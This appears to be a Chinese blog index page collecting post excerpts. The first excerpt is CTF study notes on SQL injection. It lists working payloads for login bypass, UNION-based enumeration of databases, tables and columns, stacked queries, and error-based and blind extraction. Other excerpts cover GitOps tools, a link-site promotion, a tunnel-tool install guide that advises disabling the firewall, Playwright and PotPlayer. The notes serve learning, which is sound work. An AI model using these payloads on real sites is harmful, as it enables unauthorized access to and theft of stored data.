sql注入学习

已关闭评论

首先来了解一下在CTF中最为常见的sql查询语句 1 select * from users where username=’username’ and password=’password’; 这个语句的意图也非常明显,查询users数据表中的所有字段,看能否找到用户输入的用户名和对应的密码。 利用点也很明确,通过闭合单引号在该查询语句的基础上添加我们想要的查询语句(此即为sql注入) 下面对CTF中出现的一些常见考点做一个简单的梳理和总结 万能密码(以上面这条查询语句为例) 1 2 ‘or 1=1# username=admin\&password=or 1;# //通过斜杠转义单引号 联合注入 有无回显测试 1 2 ?id=-1’order by 1%23 //使用order by主要用于确定字段数 ?id=1’union select 1,2,3%23 有回显注入 分为数字型,字符型 利用select查询 (以字符型注入为例) 查询sql版本 1 ?id=-1’union select 1,version(),3%23 查询数据库名(把database放在回显点上): 1 ?id=-1’union select 1,database(),3%23 查询数据表名: 1 ?id=-1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23 查询字段名: 1 ?id=-1’union select 1,database(), group_concat(column_name) from information_schema.columns where table_name='(数据表名)’%23 查询结果: 1 ?id=-1′ union select (字段名),2 from 表名 %23 堆叠查询 查询数据库: 1 1′;show databases;%23 查询数据表: 1 1′;show tables;%23 查询字段名(如果数据表名是数字形式,使用反引号): 1 1′;show columns from (数据表名);%23 堆叠查询没有直接读取字段值的方法,但是有时候可以通过 预处理 运用handler命令: 1 1′;handler (数据表) open;handler (数据表) read first;handler (数据表) close;%23 运用rename命令: 1 1′;rename tables `(默认表)` to `(新表)`;rename tables `(待查询的表)` to `(默认表)`; alter table `(默认表)` change `(待查询字段)` `(默认字段)` varchar(100);23 报错注入 基于extractvalue()的payload: 查询数据库: 1 id=a’and extractvalue(1,concat(0x7e,select(database())))%23 查询数据表: 1 id=a’ and extractvalue(1,concat(0x7e,select(group_concat(table_name)from(information_schama.tables)where(table_schema)like(‘数据库名’))%23 查询字段: 1 id=a’ and extractvalue(1,concat(0x7e,select(group_concat(column_name)from(information_schema.columns)where(table_name)like(‘数据表名’))))%23 查询字段值(字段名和数据表名不需要单引号): 1 id=a’ and extractvalue(1,concat(0x7e,select(group_concat(字段名))from(数据表名)))%23 可用updatexml(): 查询数据库名: 1 id=a’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23 无回显注入 布尔盲注 1 id=1′ and length(database())

GitOps 工具选型,33 款工具任你挑!

已关闭评论

GitOps 借鉴了 DevOps 方法论的自动化方面,是一种旨在通过软件开发和部署来简化基础设施管理和云操作的方法。虽然许多人认为 GitOps 可以替代 DevOps,但事实并非如此,该方法仅专注于实现 DevOps 方法论中的自动化这一个方面。 具体来说,GitOps 使用 Git 拉取(pull)请求来自动化基础设施配置和软件部署,所有这些都是为了使 CI/CD 变得更加高效。 GitOps 将 Git 作为应用程序开发和云基础设施的唯一事实源;采用声明式语句来简化配置和部署。 GitOps 统一了许多关键任务,比如云集群(特别是运行在云中的容器)的部署、管理和监控,并允许开发人员对他们的应用程序部署管道有更多的控制。由于 Git 可用于基础设施即代码(IaC)和应用程序开发,因此它是该方法的理想事实存储库。 1GitOps 的好处 对于那些使用该方法的人来说,GitOps 提供了一些关键的优势,首先是更精细的 CI/CD 管道本身。该方法充分利用了云原生应用程序和可伸缩云基础设施的优势,而没有引入常见的复杂性。 其他好处还包括: 更高的可靠性,这是由 Git 的原生特性决定的。如果新代码导致了错误,你可以回滚部署并使用 Git 的跟踪机制恢复到该应用程序的任何版本。这也会使云基础设施更加健壮。 提高了稳定性,尤其是在管理 Kubernetes 集群时。一切都是可跟踪的,并且集群配置中的变更也可以在需要时恢复。将以 Git 作为事实源,自动创建审计日志。 更高的生产效率,使得开发人员能够更加关注代码的质量,而不是管道本身。一旦将新的代码提交给 Git,一切都将完全自动化,此外还可以利用其他自动化工具。 最大程度的一致性,特别是在整个流程中使用相同的方法来进行端到端的管理时。GitOps 简化了应用程序、Kubernetes 附属组件以及 Kubernetes 基础设施的所有工作。 许多观点认为,GitOps 将持续交付与云原生优势和 IaC 结合起来,提供了这两个领域的最佳服务。GitOps 最佳实践还标准化了端到端的管道,你可以将该方法与任何现有管道进行集成,而无需进行大的更改。只要使用合适的工具即可完成这项工作。 Linux云技术栈 专注Linux、元宇宙、VR、AR、XR、MR等新型技术栈,回复【资料包】获取精心准备的学习资料!也会涉及云计算、后端、效率工具等! 15篇原创内容 公众号 2GitOps 工具 说到适合这项工作的工具,有无数工具可以帮助你将 GitOps 方法与现有工作流进行集成。一些支持 GitOps 的工具是非常流行的,甚至可以在现有的管道中使用它们。如果你想加入 GitOps,这里有一些我们推荐的工具可以帮助你进行入门学习。 1、 Kubernetes 当然,Kubernetes 是 GitOps 的核心。毕竟,该方法是基于使用 Kubernetes 来管理容器并构建可靠的基础设施的。Kubernetes 现在提供了许多自动化工具,可以简化云基础设施的部署和扩展。我们将在本文的后面部分介绍其中的某些工具。 2、Git 作为一个开源的版本控制平台,Git 非常强大。在 GitOps 中,Git 存储库将成为唯一的事实源。提交给 Git 的每个代码都将被处理和部署。你还可以使用 Git 存储库来进行开发和部署。 \3. Helm Helm 是用于配置 Kubernetes 资源的最强大的工具之一。是的,你可以使用 Homebrew 或 Yum,但是 Helm 提供的自动化功能是其他同类工具所不具备的。 \4. Flagger 如果你想进一步管理发布,来自 Weaveworks 的 Flagger 是必备的工具。它是一个管理渐进式交付的工具,允许有选择地部署新代码以识别错误。它可以很好地与本列表中的下一个工具配合使用。 5、Prometheus Prometheus 可以充当 GitOps 的监控工具。如果变更没有通过 Flagger 设置的测试,它将触发报警。除此之外,Prometheus 还弥补了 GitOps 与其他自动化工具之间的差距。 6、Flux Flux 或 FluxCD 只是 Kubernetes 的 GitOps 操作符。它会使用 Git 库中的配置自动调整 Kubernetes 的集群配置。Flux 是为什么可以轻松地恢复对 Kubernetes 集群所做更改的原因。 7、Quay 对于镜像管理,可以使用 Quay。可以使用该工具对容器镜像进行细致的管理,而所有这些都不会牺牲安全性和可靠性。Quay 使 GitOps 可以使用本地镜像注册表,而不是像 GitHub 那样要使用基于云的镜像注册表。 进击云原生 全网粉丝20W头部大号,专注云原生、Go、Linux实用脚本,效率工具,免费CSDN下载,回复 Go 获取近 6 万 Star 资源,回复 1024 获取全种类IT资料,回复 红包封面 获取超好看封面,回复 加群 加入高手如云技术交流群 125篇原创内容 公众号 8、Auto-Assign 为了使你的 Git 拉取请求和更新井井有条,可以使用一些工具。Auto-Assign 就是其中之一。顾名思义,每当发现新的拉取请求时,它都会分配审查者,因此可以密切监控变更。 9、CodeFactor 为了持续维护代码的质量,CodeFactor 是另一个可以集成到 GitOps 管道中的工具。它是一个自动的代码审查工具,当发现新的 Git 提交时,它会根据预定义的标准自动检查代码。 10、DEP 管理依赖关系是关键,特别是当你的应用程序是基于 Go 之类的语言构建的时候。为了应对这种实例,你可以使用 DEP。它是专门为管理 Go 应用程序和服务的依赖关系而创建的,并且它不会减慢 GitOps 管道的速度。 11、Kodiakhq 另一个用于管理代码的 Git 应用程序是 Kodiakhq。但该工具主要专注于自动更新和管理拉取请求,同时减少 CI 的负载。随着 Kodiakhq 的启动和运行,不再需要手动合并请求,这可以节省时间和宝贵的资源来执行其他任务。 12、Atlantis 如果你使用 Terraform 来简化资源配置,那么可以使用 Atlantis 为管道添加其他自动化功能。Atlantis 自动执行对 Terraform 的拉取请求,并在发现新请求时触发进一步的操作。 13、Helm Operator Helm Operator 还通过将自动化引入到 Helm Charts 发布中,进一步将 Helm 推向了新的高度。它被设计为在 GitOps 管道中从头开始工作,因此集成 Helm Operator 非常简单。 14、Gitkube Gitkube 更加专注于使用 Git push 构建和部署 Docker 镜像。该工具使用起来非常简单,不需要对单个容器进行复杂的配置。这也是一个可以在部署阶段节省大量时间和精力的工具。 15、Jenkins X 当谈论 GitOps 工具时,我们真的不能不谈 Jenkins X。Jenkins 最初是作为 Kubernetes 的 CI/CD 平台的,但是该平台可以用来无缝地管理你的 GitOps 管道。它甚至具有一个内置的预览环境来最大程度地减少代码和部署错误。 16、Restyled 为了实现更好的标准化,Restyled 会强制执行某种编码样式。由于 GitOps 被设计为一种标准化端到端流程的方法,因此具有自动执行代码审查和重新合并请求的能力是一个巨大的优势。 17、Argo CD Argo CD 采用了一种更直观的方式来处理 GitOps。它可视化了应用程序和环境的配置,并使用图表和可视化的提示来模拟 GitOps 管道。你也可以将 Argo CD 与 Helm 和其他 GitOps 工具结合使用。 18、Kapp Kapp 是 Kubernetes 应用程序的衍生名称,专注于管道的部署方面。它将由其他自动化工具创建的软件包集成到 GitOps 工作流中,并基于它们生成 Kubernetes 配置。 19、Kpt Kpt 或“kept”是用于简化 Kubernetes 资源部署和配置的另一种工具。它使用声明来处理资源配置,从而使开发人员可以更好地控制他们的基础设施。使用 Kpt 完全不需要手动配置。 20、Stale Stale 能处理一些令许多开发人员都很恼火的事情:悬而未决或被放弃的问题以及拉取请求。使用 Stale,你可以配置何时将拉取请求和问题视为放弃,然后自动管理这些请求和问题。 21、 Kube Backup Kube Backup 是维护 Kubernetes 集群配置的重要工具。它将集群备份到 Git,特别是集群的资源状态。如果环境发生灾难性故障,可以使用 Kube Backup 来更快地启动和运行应用程序。 22、Untrak Untrak 是一个用于管理 Kubernetes 集群资源的便捷工具。该工具会自动在集群中查找未跟踪的资源。它还可以处理垃圾回收,并能帮助你保持 Kubernetes 集群的精益。 23、Fluxcloud Fluxcloud 整合了 Slack 与 GitOps。如果你使用 Flux(FluxCD),那么也一定会喜欢 Fluxcloud。它消除了对 Weave Cloud 的需求,并允许为每个 FluxCD 活动生成 Slack……

继续阅读»»»

Jay同学的资源库网站上线啦,聚合4000+网站,持续更新,汇集全网资源

已关闭评论

前言:当你苦苦寻找某些资源无果时,是否想过如果有那么一个资源库,并且资源库还能支持一键搜索自己想要的资源时,那该多好;网络上的资源鱼龙混杂,如何获取更多优质的资源渠道,成为别人眼中的大佬?这时候大家会发现很多大佬都有自己私藏的浏览器资源书签,少则几百,多着上万;但是即使你自己拥有上万个书签网站,使用和检索起来同样很麻烦,当需要寻找某些资源时仍无从下手 资源库:所以,Jay同学的资源库上线了,区别于其他的导航网站,Jay同学的资源库在书签数目、分类、搜索等功能上占绝对优势,并不断更新数以万计的优质网站,其他大佬的书签也会不定时上传更新;网站目前聚合了4000+资源网站,并且进行了精细分类,所有站点均一键直达;聚合全网软件、影视、游戏、工具、磁力、资料、网盘等各类站点,对于需要的资源支持直接搜索;总之,一句话,只需要有Jay同学的资源库,就无需再去其他地方苦苦寻找资源被套路了,实现自给自足 注意事项:首选电脑端访问以达到良好浏览效果,手机端访问目录显示不佳,并且QQ、微信等会限制访问外链导致无法打开网站;若仍坚持使用手机端访问,尽量不选用内置浏览器,选用火狐、chrome、Via、夸克等浏览器访问所有资源发布均以公众号为根本,为防失联获取第一手消息,持续关注公众号动态哦 网站域名后期可能会出现更改 为防失联网址获取统一后台回复 【资源库】 网站完全白嫖,若帮助到大家 文末点在看支持Jay同学哦 END

Proxyer:一款简单且带Web面板的内网穿透工具

已关闭评论

说明:关于内网穿透的工具,博主已经介绍的非常多了,比如frp、lanproxy、nps、holer、sish和serveo等,用起来都还行,不过有些在安装和使用上对于一些新手来说,还是比较复杂的,最近博主发现了个新的内网穿透项目Proxyer,目前仅支持TCP协议、虽然看起来功能比较简单,但基本可以满足日常使用了,特别是在安装和使用方面,对于新手是比较友好的,这里就分享下。 截图 请输入图片描述 请输入图片描述 服务端 Github地址:https://github.com/khvysofq/proxyer 1、安装Docker #CentOS 6 rpm -iUvh http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm yum update -y yum -y install docker-io service docker start chkconfig docker on #CentOS 7、Debian、Ubuntu curl -sSL https://get.docker.com/ | sh systemctl start docker systemctl enable docker 2、安装Docker Compose curl -L “https://get.daocloud.io/docker/compose/releases/download/1.24.1/docker-compose-(uname -s)-(uname -m)” -o /usr/local/bin/docker-compose chmod +x /usr/local/bin/docker-compose 3、安装Proxyer wget https://raw.githubusercontent.com/khvysofq/proxyer/master/docker-compose.yml #请将后面1.1.1.1改成你的服务器ip地址后再运行 export PROXYER_PUBLIC_HOST=1.1.1.1 docker-compose up -d 安装完成后,就可以通过ip:6789访问服务端WEB管理面板了,进去后需要设置一个客户端认证密码。 然后CentOS系统建议关闭防火墙使用,或者打开部分端口也行,关闭命令: #CentOS 6系统 service iptables stop chkconfig iptables off #CentOS 7系统 systemctl stop firewalld systemctl disable firewalld 像阿里云等服务器,还需要去安全组那里开放下端口。 客户端 进入服务端面板后,界面会提供Linux、Windows、macOS客户端版本,然后自行根据自身系统下载指定版本的压缩包即可。 Windows可以直接下载界面版本,然后双击可执行文件,会弹出一个网页界面,输入上面的认证密码,即可开始配置穿透。 Linux下载压缩包后,解压出二进制文件,直接在当前目录使用./proxyer命令运行即可。 最后使用起来还是很简单的,由于是新项目,功能可能不是很丰富,看作者后期会不会慢慢完善了。

Web自动化办公Playwright(52破解)

已关闭评论

本帖最后由 少轻丶狂 于 2021-11-12 21:43 编辑
注意本文档建立在playwright-nodejs1.16版本基础上,本教程并未完全参照官方文档(主要是在这个版本之前就已经接触playwright-python

PotPlayer 篇七:享受丝质顺滑,PotPlayer播放器的几种补帧方法介绍和用法

已关闭评论

好久没有折腾PotPlayer播放器了,说实话,就如我后来所说,PotPlayer播放器对于我们绝大部分人来说,不需要搞的过于复杂,一般默认就好,至于插件什么的,装不装真的很无所谓,只能说有改变,但是绝对没有质的变化,而对于配置低的用户,特别是显卡不好的人来说,甚至是负优化。所以,我在这里在次建议:停止折腾,默认就好!